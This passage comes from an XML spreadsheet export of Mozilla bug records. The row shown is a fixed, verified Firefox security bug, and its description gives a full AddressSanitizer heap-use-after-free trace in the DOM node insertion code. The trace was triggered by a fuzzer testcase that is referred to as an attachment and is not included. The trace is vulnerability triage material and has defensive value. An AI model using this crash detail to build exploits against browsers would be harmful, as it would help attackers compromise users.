          <t>2024-05-30 09:22:22 -0700</t>
        </is>
      </c>
      <c r="E3393" t="n">
        <v>1</v>
      </c>
      <c r="F3393" t="n">
        <v>1</v>
      </c>
      <c r="G3393" t="n">
        <v>3</v>
      </c>
      <c r="H3393" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3393" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3393" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3393" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3393" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3393" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3393" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3393" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3393" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main50+]</t>
        </is>
      </c>
      <c r="Q3393" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3393" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3393" t="inlineStr">
        <is>
          <t>mozilla52</t>
        </is>
      </c>
      <c r="T3393" t="n">
        <v>1</v>
      </c>
      <c r="U3393" t="n">
        <v>0</v>
      </c>
      <c r="V3393" t="n">
        <v>14</v>
      </c>
      <c r="W3393" t="inlineStr">
        <is>
          <t>Created attachment 8799391
crash.html minimized testcase: requires Jesse's dom fuzzing addon
The attached testcase crashes the latest ASAN build of Firefox () as follows. It requires Jesse's fuzzPriv extension to trigger reliably.
=================================================================
==503==ERROR: AddressSanitizer: heap-use-after-free on address 0x60d0000c10b8 at pc 0x7fa98b881aa3 bp 0x7ffe33f8c2b0 sp 0x7ffe33f8c2a8
READ of size 8 at 0x60d0000c10b8 thread T0 (Web Content)
    #0 0x7fa98b881aa2 in GetParentNode /home/worker/workspace/build/src/dom/base/nsINode.h:914:12
    #1 0x7fa98b881aa2 in nsINode::ReplaceOrInsertBefore(bool, nsINode*, nsINode*, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/base/nsINode.cpp:2187
    #2 0x7fa98b87e254 in InsertBefore /home/worker/workspace/build/src/dom/base/nsINode.h:1846:12
    #3 0x7fa98b87e254 in nsINode::Prepend(mozilla::dom::Sequence&lt;mozilla::dom::OwningNodeOrString&gt; const&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/base/nsINode.cpp:1889
    #4 0x7fa98d1cc7cb in mozilla::dom::ElementBinding::prepend(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::Element*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/ElementBinding.cpp:4189:3
    #5 0x7fa98d5cc460 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2825:13
    #6 0x7fa9938061a5 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #7 0x7fa9938061a5 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:446
    #8 0x7fa9937e6956 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:509:12
    #9 0x7fa9937e6956 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #10 0x7fa9937cbc5b in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:404:12
    #11 0x7fa99380680f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:476:15
    #12 0x7fa993806e52 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:10
    #13 0x7fa99330b8cd in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2825:12
    #14 0x7fa98d100a0c in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:47:8
    #15 0x7fa98d9f0ef9 in HandleEvent&lt;mozilla::dom::EventTarget *&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:64:12
    #16 0x7fa98d9f0ef9 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1129
    #17 0x7fa98d9f250f in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1286:17
    #18 0x7fa98d9dcac9 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:401:9
    #19 0x7fa98d9e086d in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
    #20 0x7fa98b3b9ca1 in nsContentUtils::MaybeFireNodeRemoved(nsINode*, nsINode*, nsIDocument*) /home/worker/workspace/build/src/dom/base/nsContentUtils.cpp:4314:5
    #21 0x7fa98b87f2c5 in nsINode::ReplaceOrInsertBefore(bool, nsINode*, nsINode*, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/base/nsINode.cpp:2177:7
    #22 0x7fa98c16c4a0 in InsertBefore /home/worker/workspace/build/src/dom/base/nsINode.h:1846:12
    #23 0x7fa98c16c4a0 in AppendChild /home/worker/workspace/build/src/dom/base/nsINode.h:1850
    #24 0x7fa98c16c4a0 in mozilla::dom::NodeBinding::appendChild(JSContext*, JS::Handle&lt;JSObject*&gt;, nsINode*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/NodeBinding.cpp:695
    #25 0x7fa98d5cc460 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2825:13
    #26 0x7fa9938061a5 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #27 0x7fa9938061a5 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:446
    #28 0x7fa9937e6956 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:509:12
    #29 0x7fa9937e6956 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #30 0x7fa9937cbc5b in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:404:12
    #31 0x7fa99380680f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:476:15
    #32 0x7fa993806e52 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:10
    #33 0x7fa99330b8cd in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2825:12
    #34 0x7fa98d0fd852 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:259:37
    #35 0x7fa98da24c41 in Call&lt;nsISupports *&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:361:12
    #36 0x7fa98da24c41 in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /home/worker/workspace/build/src/dom/events/JSEventHandler.cpp:214
    #37 0x7fa98d9f0f44 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1133:16
    #38 0x7fa98d9f250f in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1286:17
    #39 0x7fa98d9dc806 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:380:5
    #40 0x7fa98d9e086d in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
    #41 0x7fa98fc56055 in nsDocumentViewer::LoadComplete(nsresult) /home/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:998:7
    #42 0x7fa9909d01de in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7615:5
    #43 0x7fa9909cbfb4 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7415:7
    #44 0x7fa9909d357f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /home/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7312:13
    #45 0x7fa98a84e6a0 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1255:3
    #46 0x7fa98a84d668 in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:840:5
    #47 0x7fa98a84a41c in nsDocLoader::DocLoaderIsEmpty(bool) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:730:9
    #48 0x7fa98a84c4f4 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:612:5
    #49 0x7fa98a84d07c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:468:14
    #50 0x7fa988be8f8b in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:633:18
    #51 0x7fa98b7c960f in nsDocument::DoUnblockOnload() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8625:7
    #52 0x7fa98b8a19ff in nsUnblockOnloadEvent::Run() /home/worker/workspace/build/src/dom/base/nsDocument.cpp:8578:5
    #53 0x7fa988a0f39d in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1082:7
    #54 0x7fa988a8ec1c in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/glue/nsThreadUtils.cpp:290:10
    #55 0x7fa9897ec60f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #56 0x7fa98975e3b8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #57 0x7fa98975e3b8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:225
    #58 0x7fa98975e3b8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:205
    #59 0x7fa98f38046f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #60 0x7fa9914d72c7 in XRE_RunAppShell /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:869:12
    #61 0x7fa98975e3b8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:232:3
    #62 0x7fa98975e3b8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:225
    #63 0x7fa98975e3b8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:205
    #64 0x7fa9914d6803 in XRE_InitChildProcess /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:701:7
    #65 0x4dfb2b in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:197:19
    #66 0x4dfb2b in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:392
    #67 0x7fa9a418682f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
    #68 0x41ba08 in _start (/home/nils/fuzzer3/firefox/firefox+0x41ba08)
0x60d0000c10b8 is located 40 bytes inside of 136-byte region [0x60d0000c1090,0x60d0000c1118)
freed by thread T0 (Web Content) here:
    #0 0x4b215b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7fa9888e9574 in SnowWhiteKiller::~SnowWhiteKiller() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2665:9
    #2 0x7fa9888e9166 in nsCycleCollector::FreeSnowWhite(bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2840:3
    #3 0x7fa9888ef85c in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3826:3
    #4 0x7fa9888ef03c in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3651:9
    #5 0x7fa9888f2216 in nsCycleCollector_collect(nsICycleCollectorListener*) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4144:3
    #6 0x7fa98b8b0939 in nsJSContext::CycleCollectNow(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1440:3
    #7 0x7fa98b3fc15d in nsDOMWindowUtils::CycleCollect(nsICycleCollectorListener*, int) /home/worker/workspace/build/src/dom/base/nsDOMWindowUtils.cpp:1338:3
    #8 0x7fa988a35e36 in NS_InvokeByIndex /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_x86_64_unix.cpp:180:23
    #9 0x7fa98a416cee in Invoke /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:2064:12
    #10 0x7fa98a416cee in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1383
    #11 0x7fa98a416cee in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1350
    #12 0x7fa98a41e47b in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1143:12
    #13 0x7fa9938061a5 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #14 0x7fa9938061a5 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:446
    #15 0x7fa9937e6956 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:509:12
    #16 0x7fa9937e6956 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #17 0x7fa9937cbc5b in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:404:12
    #18 0x7fa99380680f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:476:15
    #19 0x7fa993806e52 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:10
    #20 0x7fa993308fdd in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2766:12
    #21 0x7fa98a34fe2f in xpc::FunctionForwarder(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/ExportHelpers.cpp:353:18
    #22 0x7fa9938061a5 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #23 0x7fa9938061a5 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:446
    #24 0x7fa9937e6956 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:509:12
    #25 0x7fa9937e6956 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #26 0x7fa9937cbc5b in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:404:12
    #27 0x7fa99380680f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:476:15
    #28 0x7fa993806e52 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:10
    #29 0x7fa99330b8cd in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:2825:12
    #30 0x7fa98d100a0c in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:47:8
    #31 0x7fa98d9f0ef9 in HandleEvent&lt;mozilla::dom::EventTarget *&gt; /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:64:12
    #32 0x7fa98d9f0ef9 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1129
    #33 0x7fa98d9f250f in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /home/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1286:17
    #34 0x7fa98d9dcac9 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:401:9
    #35 0x7fa98d9e086d in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /home/worker/workspace/build/src/dom/events/EventDispatcher.cpp:711:9
    #36 0x7fa98b3b9ca1 in nsContentUtils::MaybeFireNodeRemoved(nsINode*, nsINode*, nsIDocument*) /home/worker/workspace/build/src/dom/base/nsContentUtils.cpp:4314:5
previously allocated by thread T0 (Web Content) here:
    #0 0x4b247b in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x4e0d6d in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7fa98b3bf0b7 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7fa98b3bf0b7 in nsContentUtils::SetNodeTextContent(nsIContent*, nsAString_internal const&amp;, bool) /home/worker/workspace/build/src/dom/base/nsContentUtils.cpp:4823
    #4 0x7fa98b5ef9df in mozilla::dom::FragmentOrElement::SetTextContentInternal(nsAString_internal const&amp;, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/base/FragmentOrElement.cpp:1135:12
    #5 0x7fa98c1766fd in SetTextContent /home/worker/workspace/build/src/dom/base/nsINode.h:1349:5
    #6 0x7fa98c1766fd in mozilla::dom::NodeBinding::set_textContent(JSContext*, JS::Handle&lt;JSObject*&gt;, nsINode*, JSJitSetterCallArgs) /home/worker/workspace/build/src/obj-firefox/dom/bindings/NodeBinding.cpp:566
    #7 0x7fa98d5cbc53 in mozilla::dom::GenericBindingSetter(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2793:8
    #8 0x7fa9938061a5 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #9 0x7fa9938061a5 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:446
    #10 0x7fa993807ee8 in Call /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:10
    #11 0x7fa993807ee8 in js::CallSetter(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:649
    #12 0x7fa99386dfc8 in SetExistingProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2403:10
    #13 0x7fa99386dfc8 in js::NativeSetProperty(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;jsid&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::QualifiedBool, JS::ObjectOpResult&amp;) /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2438
    #14 0x7fa9937df702 in SetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1515:12
    #15 0x7fa9937df702 in SetPropertyOperation /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:258
    #16 0x7fa9937df702 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2715
    #17 0x7fa9937cbc5b in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:404:12
    #18 0x7fa993808692 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::AbstractFramePtr, JS::Value*) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:685:15
    #19 0x7fa993808f2b in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:717:12
    #20 0x7fa99331e2d4 in Evaluate(JSContext*, js::ScopeKind, JS::Handle&lt;JSObject*&gt;, JS::ReadOnlyCompileOptions const&amp;, JS::SourceBufferHolder&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:4396:19
    #21 0x7fa99331f02b in Evaluate /home/worker/workspace/build/src/js/src/jsapi.cpp:4423:12
    #22 0x7fa99331f02b in JS::Evaluate(JSContext*, JS::AutoObjectVector&amp;, JS::ReadOnlyCompileOptions const&amp;, JS::SourceBufferHolder&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jsapi.cpp:4481
    #23 0x7fa98b8c4c07 in nsJSUtils::EvaluateString(JSContext*, JS::SourceBufferHolder&amp;, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions&amp;, nsJSUtils::EvaluateOptions const&amp;, JS::MutableHandle&lt;JS::Value&gt;, void**) /home/worker/workspace/build/src/dom/base/nsJSUtils.cpp:206:12
    #24 0x7fa98b8c5a57 in nsJSUtils::EvaluateString(JSContext*, JS::SourceBufferHolder&amp;, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions&amp;, void**) /home/worker/workspace/build/src/dom/base/nsJSUtils.cpp:266:10
    #25 0x7fa98b94a197 in nsScriptLoader::EvaluateScript(nsScriptLoadRequest*) /home/worker/workspace/build/src/dom/base/nsScriptLoader.cpp:2202:14
    #26 0x7fa98b9470b2 in nsScriptLoader::ProcessRequest(nsScriptLoadRequest*) /home/worker/workspace/build/src/dom/base/nsScriptLoader.cpp:1988:10
    #27 0x7fa98b3c1de1 in nsContentUtils::RemoveScriptBlocker() /home/worker/workspace/build/src/dom/base/nsContentUtils.cpp:5190:5
    #28 0x7fa98b79b414 in nsDocument::EndUpdate(unsigned int) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:4813:3
    #29 0x7fa98ddef33c in nsHTMLDocument::EndUpdate(unsigned int) /home/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:2423:3
    #30 0x7fa98b88173e in ~mozAutoDocUpdate /home/worker/workspace/build/src/dom/base/mozAutoDocUpdate.h:40:7
    #31 0x7fa98b88173e in nsINode::ReplaceOrInsertBefore(bool, nsINode*, nsINode*, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/base/nsINode.cpp:2520
    #32 0x7fa98c16c4a0 in InsertBefore /home/worker/workspace/build/src/dom/base/nsINode.h:1846:12
    #33 0x7fa98c16c4a0 in AppendChild /home/worker/workspace/build/src/dom/base/nsINode.h:1850
    #34 0x7fa98c16c4a0 in mozilla::dom::NodeBinding::appendChild(JSContext*, JS::Handle&lt;JSObject*&gt;, nsINode*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/NodeBinding.cpp:695
    #35 0x7fa98d5cc460 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2825:13
    #36 0x7fa9938061a5 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #37 0x7fa9938061a5 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:446
    #38 0x7fa9937e6956 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:509:12
    #39 0x7fa9937e6956 in Interpret(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2922
    #40 0x7fa9937cbc5b in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:404:12
    #41 0x7fa99380680f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:476:15
    #42 0x7fa993806e52 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:10
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/dom/base/nsINode.h:914:12 in GetParentNode
Shadow bytes around the buggy address:
  0x0c1a800101c0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1a800101d0: 00 00 00 00 00 fa fa fa fa fa fa fa fa fa 00 00
  0x0c1a800101e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa
